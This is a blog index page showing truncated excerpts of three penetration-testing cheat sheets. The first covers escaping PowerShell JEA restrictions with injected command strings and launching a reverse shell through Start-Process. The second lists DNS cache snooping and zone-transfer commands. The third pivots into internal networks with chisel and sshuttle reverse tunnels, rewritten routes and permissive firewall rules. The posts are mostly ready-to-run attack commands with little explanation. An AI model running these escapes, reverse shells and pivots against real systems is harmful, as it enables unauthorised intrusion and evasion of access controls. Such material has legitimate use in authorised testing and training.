Posts

Showing posts from 2020

AD PenTest - Lateral Movement & Persistence

Bypassing JEA #View all the commands that we have access to get-command * #View the source code of the Commands/cmdlets Get-Command -ShowCommandInfo -Name CmdLet_NAME Get-Command -ShowCommandInfo -Name Get-ChildItem #using SharpMapExec to bypass JEA or find interesting items .\SharpMapExec.exe ntlm winrm /user:USERNAME/password:"p@ssw0RD!" /domain:steins.local /computername:10.10.10.10 Note : ExpandString & Invoke-Expression might be vulnerable to command execution #Examples of Bypassing JEA get-something -command 'Hello $([void] (Get-Item C:\))' get-something -command '$(""; ipconfig)' #If Full language mode is enabled function test() {whoami};test #Bypassing JEA if Start-Process is accessible Enter-PSSession -ComputerName <Name> -ConfigurationName <Name> Start-Process cmd.exe revshell.exe Powershell Remote Access Enable-PSRemoting #uses TCP - Port 5985, 5986 for SSL. #Start a PS Session Enter-PSSession -ComputerName kurisu.st...

Network & Linux Tools

Traceroute By default, traceroute sends UDP packets with incrementing destination ports starting at the base port of 33434, going up by one port for each packet sent (each hop measured 3 times) #traceroute to multiple hosts traceroute -g 10.10.10.1, 10.10.10.2 #Use ICMP instead of UDP traceroute -I 10.10.10.10 #Use TCP SYN instead of UDP traceroute -T 10.10.10.10 Online Traceroute Websites : 1) Traceroute.org 2) Kloth.net/services/traceroute.php 3) tracert.com nslookup check if there is anything in the DNS Cache - DNS Cache Snooping >nslookup set norecurse www.website.com set recurse wwww.website.com #Zone transfer > dig @10.10.10.10 target -t AXFR #Incremental Zone Transfer dig @10.10.10.10 -t IXFR=N Kill a running Process/Open Port netstat -pantp | grep LIST #View the process ID sudo lsof -t -i:80 #Kill the process sudo fuser -k 80/tcp Find Largest Files in Linux du -a /var | sort -n -r | head -n 10 #Get Readable output du -hsx -- * | sort -rh | head -10 Installing Samba on...

Pivoting into an internal network behind firewall

Accessing a Victim network from a Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali - setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from the windows box. #If the above doesn't work #assuming Kali and windows are on Eth0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT s...